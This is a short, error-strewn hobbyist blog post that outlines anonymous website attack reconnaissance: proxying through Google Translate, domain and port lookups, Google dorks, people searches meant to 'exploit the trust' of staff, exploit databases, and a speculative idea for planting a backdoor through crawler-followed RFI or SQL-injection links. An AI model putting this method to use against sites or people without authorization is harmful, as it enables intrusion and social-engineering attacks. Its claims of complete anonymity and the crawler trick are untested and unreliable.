In my first Blog Post I want to talk about a quick way to
"Hack the Server"
of any given website, only using web-based services available for everbody.So Why would we want to do this?
- Its avalibale from everywhere (Libarys,Schools,Museums ... )
- Its completly anonymous (you can find out alot without even going to the Site)
- Its quick
- Its clean (leaves no traces in Logfiles)
Note:Please only use these Techniques on Networks you own or are allowed to pwn.
1)Ensoure your own Anonymity(at least at some grade).
We will be using Google translate as our web proxy
http://translate.google.de/translate?hl=en&sl=de&tl=en&u=wieistmeineip.de
//Of course your request will be logged on googles server, but target server are only going to see a request from a google ip address.
2)Find out Whats behinde the Server and Domain.
For this we are going to use
http://centralops.net/co/DomainDossier.aspx
It gives us ALOT of info about the domain and also some Basic info about the Services running and a traceroute.
//We will get to how to use the collected info later.
After that we will try to find out even more about the Services with:
http://ping.eu/port-chk/
Some intersting Ports:
sql:1433(MySql),5432(PortgreSql),1521(Oracle)
remote acces:3389(Remote Desktop),22,23
Alright we now know alot about the Domain and the Server but if we need to know even more:
http://www.iptools.com/
Is THE most complete website for online ip tools.
3)Find out about the Web-Apps.
Well Here it could get tricky for some Sites, and this task is slow.
However it should still be noted.
You could try using google dorks for that,to save time use blackl.com instead of google.com (this is a real gem, basicly its google, but wihout filtering/blocking requests).
And a list of dorks OR you use Goolag from the CDC(mutch faster, however you'll have to download this).
4)Finding out about the People
You can use online People searches:
http://pipl.com/
http://people.yahoo.com/
Social networks:
http://yoname.com/
Metacrawler:
http://www.metacrawler.com/
The best tool to do this is Maltego from Paterva(has to be downloaded):
http://www.paterva.com/
With the Info about the People you can try to search for forum and newsgroup posts form them, witch could contain info about the technology they are using.
Remeber:If you traget the people then exploit the trust.
5)Use the Info
With the Information gatherd you can find the Actual Vulnerabiltys:
http://osvdb.org/
http://www.exploit-db.com/
http://www.3xpl01t.com/
6)Exploit the host
This can not really be done without leaving traces in Logs, but there are some ways that allow an attacker to preform this task in an very anonymous way!
For example an attacker could craft a Link for placing a backdoor ,example in case of an RFI,OS Command exec. or an SQLI, that would (if executed) place a Backdoor on the system, then that link is posted somewhere on the net.
Some search robot will pick it up and follow the Link, by this the url is executed by the crawler and the Server is owend.
I have never done this or seen a case where it has been used, however i think its possible to do.
Have fun!
More Tutorials will follow.
